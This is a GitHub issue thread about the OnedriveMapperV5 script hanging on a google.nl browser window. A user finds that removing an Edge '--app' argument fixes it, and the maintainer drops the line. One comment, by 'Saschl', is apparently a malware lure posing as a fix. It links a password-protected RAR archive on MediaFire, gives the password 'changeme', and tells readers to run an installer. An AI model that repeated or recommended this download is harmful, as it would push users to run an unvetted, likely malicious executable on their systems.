### ISSUE TITLE
Browser window stuck on google.nl

### ISSUE THREAD

**Issue by UBL2015** [jflieben/OnedriveMapperV5#8]
We've been using 5.15, however a new issue started this morning where the mapping process gets stuck stuck at a blank browser window loading google.nl. I'm not sure what change triggered this but it is happening across multiple systems and locations. Manually closing the window kills the mapping process. On a whim I deleted this line in the script: **$global:edgeOptions.addArguments("--app=https://www.google.nl")** and that seems to have resolved the issue as the mapping process completes successfully. However, I'm not quite sure what the purpose of that specific argument is.

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jflieben** [comment]
> We've been using 5.15, however a new issue started this morning where the mapping process gets stuck stuck at a blank browser window loading google.nl. I'm not sure what change triggered this but it is happening across multiple systems and locations. Manually closing the window kills the mapping process. On a whim I deleted this line in the script: **$global:edgeOptions.addArguments("--app=https://www.google.nl")** and that seems to have resolved the issue as the mapping process completes successfully. However, I'm not quite sure what the purpose of that specific argument is.

thanks! I've removed that line from onedrive. Possibly your browser was prompting for cookies or something else on google.nl, I don't think that line is needed anymore :)
